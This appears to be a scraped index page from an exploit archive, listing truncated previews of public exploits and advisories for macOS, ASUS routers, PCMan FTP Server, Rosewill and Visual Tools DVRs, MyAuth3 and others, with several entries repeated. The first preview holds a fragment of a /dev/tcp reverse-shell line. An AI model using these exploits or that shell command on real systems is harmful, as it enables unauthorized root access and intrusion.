Mac OS X 10.8.4 Local Privilege Escalation

!/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port...

ASUS RT-AC66U acsd Param - Remote Root Shell Exploit

Exploit for hardware platform in category remote exploits !/usr/bin/env python import signal, struct from time import sleep from socket import from sys import exit, excinfo TitleASUS RT-AC66U Remote Root Shell Exploit - acsd param command Discovered and ReportedJune 2013 Discovered/Exploited...

PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit

Exploit for windows platform in category remote exploits !/usr/bin/env python import signal from time import sleep from socket import from sys import exit, excinfo TitlePCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command Discovered and ReportedJune 2013 Discovered/Exploited ByJacob...

PCMan FTP Server 2.0.7 - Remote Buffer Overflow

PCMan FTP Server 2.0.7 - Remote Buffer Overflow !/usr/bin/env python import signal from time import sleep from socket import from sys import exit, excinfo TitlePCMan FTP Server v2.0.7 Remote Root Shell Exploit - USER Command Discovered and ReportedJune 2013 Discovered/Exploited ByJacob...

kernel

New Linux kernel packages are available for Slackware 13.37 and 14.0 to fix a security issue. Here are the details from the Slackware 14.0 ChangeLog: patches/packages/linux-3.2.45/: Upgraded. Upgraded to new kernels that fix CVE-2013-2094, a bug that can allow local users to gain a root shell. Be...

Draytek Vigor 3900 1.06 - Local Privilege Escalation

Draytek Vigor 3900 1.06 - Local Privilege Escalation Exploit Title: Previlege escalation Date: 19/3/2013 Exploit Author: Mohammad abou hayt Vendor Homepage: http://www.draytek.com.tw/index.php?option=comk2&view=item&layout=item&id=2627&Itemid=593&lang=en Software Link: N/A Version: Vigor 3900...

Rosewill RSVA11001 - Remote Command Injection

I have been hacking on a Rosewill RSVA11001 for a while now, something to suck up my free time. I had pulled apart the firmware previously but did not succeed in finding a way to get a shell on the device. The box is Hi3515 based, I found an exploit for another similar box Ray Sharp but it did no...

Rosewill RSVA11001 - Remote Command Injection

Rosewill RSVA11001 - Remote Command Injection I have been hacking on a Rosewill RSVA11001 for a while now, something to suck up my free time. I had pulled apart the firmware previously but did not succeed in finding a way to get a shell on the device. The box is Hi3515 based, I found an exploit f...

Rosewill RSVA11001 - Remote Command Injection

Exploit for hardware platform in category remote exploits I have been hacking on a Rosewill RSVA11001 for a while now, something to suck up my free time. I had pulled apart the firmware previously but did not succeed in finding a way to get a shell on the device. The box is Hi3515 based, I found ...

Rosewill RSVA11001 Remote Code Execution

I have been hacking on a Rosewill RSVA11001 for a while now, something to suck up my free time. I had pulled apart the firmware previously but did not succeed in finding a way to get a shell on the device. The box is Hi3515 based, I found an exploit for another similar box Ray Sharp but it did no...

rpi-update - Insecure Temporary File Handling / Security Bypass

// source: https://www.securityfocus.com/bid/58292/info rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability An attacker can exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected...

Centrify Deployment Manager 2.1.0.283 Local Root

/Local root exploit for Centrify Deployment Manager v2.1.0.283 local root, Centrify released a fix very quickly - nice vendor response. CVE-2012-6348 12/17/2012 http://vapid.dhs.org/advisories/centrifydeploymentmanagerinsecuretmp2.html Greetings vladz, Thanks for the inotify & syscall technique...

Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center

Security Advisory AA-007: Arbitrary File Upload Vulnerability in Sitecom Home Storage Center Severity Rating: High Discovery Date: July 29, 2012 Vendor Notification: July 30, 2012 Disclosure Date: September 11, 2012 Vulnerability Type= Arbitrary file upload Impact= Loss of system integrity...

Visual Tools DVR multiple vulnerabilities

Title: Visual Tools DVR multiple vulnerabilities Version affected: VS Series = 3.0.6.16, VX Series = 4.2.19.2 Vendor: http://www.visual-tools.com/ Discovered By: Andrea Fabrizi Email: [email protected] Web: http://www.andreafabrizi.it Status: unpatched Visual Tools develops, manufactures a...

Visual Tools DVR Command Injection / Password Disclosure

Title: Visual Tools DVR multiple vulnerabilities Version affected: VS Series = 3.0.6.16, VX Series = 4.2.19.2 Vendor: http://www.visual-tools.com/ Discovered By: Andrea Fabrizi Email: [email protected] Web: http://www.andreafabrizi.it Status: unpatched Visual Tools develops, manufactures a...

Visual Tools DVR Command Injection / Password Disclosure

Exploit for hardware platform in category web applications Title: Visual Tools DVR multiple vulnerabilities Version affected: VS Series = 3.0.6.16, VX Series = 4.2.19.2 Vendor: http://www.visual-tools.com/ Discovered By: Andrea Fabrizi Email: email protected Web: http://www.andreafabrizi.it Statu...

MyAuth3 - Blind SQL Injection

Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit Google Dork: allinurl:1881/?console=panel Date: 09/06/2011 Author: Marcio Almeida marcioatalligatorteamdot org | @marcioalm Version: 3.0 Tested on: Linux EDB-Note: apparently no true exploit is needed to dump system pwd...

MyAuth3 - Blind SQL Injection

MyAuth3 - Blind SQL Injection Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit Google Dork: allinurl:1881/?console=panel Date: 09/06/2011 Author: Marcio Almeida marcioatalligatorteamdot org | @marcioalm Version: 3.0 Tested on: Linux EDB-Note: apparently no true exploit ...

MyAuth3 Blind SQL Injection

Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit Google Dork: allinurl:1881/?console=panel Date: 09/06/2011 Author: Marcio Almeida marcioatalligatorteamdotorg | @marcioalm Version: 3.0 Tested on: Linux EDB-Note: apparently no true exploit is needed to dump system pwd...

Soapbox 0.3.1 Local Root

----------------------------------- soapbox 0.3.1 Description: "Soapbox allows to restrict processes to write only to those places you want. Read-access however is still based on file-permissions. By preloading the Soapbox library, you can run programs as root and monitor which writes/changes are...